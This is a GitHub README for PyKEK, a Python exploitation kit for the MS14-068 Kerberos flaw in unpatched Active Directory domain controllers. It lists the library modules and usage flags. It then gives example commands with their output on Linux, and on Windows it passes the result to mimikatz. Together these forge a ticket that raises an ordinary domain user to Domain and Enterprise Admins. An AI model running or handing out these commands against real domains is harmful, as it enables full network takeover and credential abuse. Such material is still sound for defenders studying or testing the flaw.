Skip to content
Kerberos Exploitation Kit
Branch: master
Clone or download
Latest commit afaaf68 Dec 5, 2014
Type Name Latest commit message Commit time
Failed to load latest commit information.
pyasn1 ms14-068 Dec 5, 2014 . Dec 5, 2014 fix Dec 5, 2014

Python Kerberos Exploitation Kit

PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)

For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .

More is coming...


Sylvain Monné

Contact : sylvain dot monne at solucom dot fr

Library content

  • kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions
  • kek.ccache: Credential Cache Binary Format (cchache)
  • kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC)
  • kek.crypto: Kerberos and MS specific cryptographic functions


Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

  • Domain Users (513)
  • Domain Admins (512)
  • Schema Admins (518)
  • Enterprise Admins (519)
  • Group Policy Creator Owners (520)

Usage :

USAGE: -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

    -p <clearPassword>
 --rc4 <ntlmHash>

Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0 

On Windows

python.exe -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`
You can’t perform that action at this time.